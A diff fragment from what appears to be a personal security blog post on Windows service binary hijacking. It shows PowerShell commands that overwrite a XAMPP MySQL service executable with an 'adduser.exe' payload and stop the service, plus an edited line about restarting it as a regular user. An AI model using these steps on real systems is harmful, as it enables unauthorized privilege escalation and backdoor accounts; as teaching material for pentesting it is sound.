ST4RGUARD/ST4RGUARD.github.io/_posts/2023-09-15-win_service_hijack.md

     PS > move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

-finally we need to restart the service which can be achieved several ways if priveleges permit
+finally we need to restart the service which can be achieved several ways if priveleges permit - but if we are running as a regular user /no sys then restart is our best bet

     PS > net stop mysql